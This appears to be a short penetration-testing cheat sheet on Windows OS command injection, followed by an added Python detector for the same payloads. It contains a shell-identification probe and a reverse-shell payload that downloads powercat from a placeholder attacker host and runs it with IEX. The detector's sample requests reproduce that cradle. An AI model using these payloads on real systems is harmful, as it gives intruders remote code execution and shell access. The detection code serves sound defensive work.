
OS Command Injection


Code snippet to check which shell (CMD or PowerShell) executes our code on a Windows server

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Reverse shell using powercat

:(dir 2>&1 *`|echo CMD);&<# rem #>IEX (New-Object System.Net.Webclient).DownloadString("http://<ATTACKER IP>/powercat.ps1");powercat -c <ATTACKER IP> -p 4444 -e powershell
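
From the defender's side, both payloads above leave recognizable strings in request parameters. The following is an added detection example, not part of the original page: it decodes query values (including double URL-encoding) and flags the markers seen in the two snippets. The `/archive` path, the `Archive` parameter and the documentation address 192.0.2.10 are assumptions made for the constructed samples.

```python
import re
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# Indicators derived from the two payloads shown on this page.
# "shell_metachar" alone is noisy; treat it as supporting evidence.
INDICATORS = {
    "shell_polyglot": re.compile(r"<#\s*rem\s*#>", re.I),
    "download_cradle": re.compile(r"\bIEX\b.*DownloadString", re.I | re.S),
    "powercat": re.compile(r"\bpowercat\b", re.I),
    "shell_metachar": re.compile(r"[;&|`]|2>&1"),
}

def fully_decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are still inspected."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(url):
    """Return {parameter: sorted indicator names} for suspicious query values."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = fully_decode(value)
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
        if hits:
            findings[name] = hits
    return findings

# Constructed sample requests; path and parameter name are hypothetical.
PROBE = "(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell"
CRADLE = ('IEX (New-Object System.Net.Webclient).DownloadString'
          '("http://192.0.2.10/powercat.ps1")')
SAMPLES = [
    "/archive?Archive=git+version",                               # benign
    "/archive?Archive=" + quote(CRADLE, safe=""),                 # encoded once
    "/archive?Archive=" + quote(quote(PROBE, safe=""), safe=""),  # encoded twice
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(scan_request(url) or "clean", "<-", url[:60])
```
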